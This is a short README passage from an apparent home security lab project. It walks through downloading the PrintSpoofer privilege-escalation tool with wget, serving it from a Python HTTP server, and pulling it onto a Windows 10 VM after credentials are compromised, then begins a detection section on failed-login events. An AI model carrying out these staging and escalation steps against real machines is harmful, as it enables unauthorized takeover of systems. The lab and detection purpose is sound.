andresMen1274/Hybrid-Security-Platform/README.md

 <img width="630" height="346" alt="image" src="https://github.com/user-attachments/assets/e3cc7501-3cdd-4fc3-9760-602afe55a4ef" />

-After the login credentials have been compromised run the command wget https://github.com/itm4n/PrintSpoofer/releases/download/v1.0/PrintSpoofer32.exe -O printspoofer.exe on the Kali Linux machine to create a script for privlage escalation.
-After it has been downloaded on the kali linux machine start a http server with Python using the command python3 -m http.server 8000.
-On the Windows 10 VM enter http://10.200.30.10:8000 and download the printSpoofer.exe file.

-This confirms success and that the user system has now been comprimised.

 ## Detection & Investigation
 ### Detection Examples
 - Windows Event ID 4625 failed login detection